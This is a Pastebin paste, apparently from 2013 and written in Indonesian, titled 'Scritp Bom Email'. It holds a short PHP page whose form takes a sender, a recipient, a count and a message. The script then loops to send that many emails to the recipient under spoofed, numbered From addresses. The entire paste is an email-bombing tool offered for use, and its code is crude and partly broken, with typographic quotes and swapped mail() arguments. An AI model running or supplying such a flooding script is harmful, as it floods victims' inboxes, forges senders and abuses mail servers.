Advertisement
Guest User

Scritp Bom Email

a guest
Jul 6th, 2013
804
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. <html>
  2. <body>
  3. <form method=post action=index.php>
  4. <pre>
  5. <input type=hidden value=ok name=ok>
  6. Dari : <input name=dari value=”<? echo $dari;?>”>
  7. Kepada : <input name=kepada value=”<? echo $kepada;?>”>
  8. Jumlah : <input name=jumlah value=”<? echo $jumlah;?>”>
  9. Isi Pesan: <textarea name=isi><?echo $isi?></textarea><br>
  10. <input type=submit value=Booom>
  11. </form></pre>
  12. <?
  13. if ($ok==”ok”)
  14. {
  15. for ($i=0;$i<$jumlah;$i++)
  16. {
  17. $a=$i.$dari;
  18. mail($kepada,$isi,”",”From : $a <$a>”);
  19. }
  20. echo (“Beres Bos”);
  21. }
  22. ?>
  23. </body>
  24. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement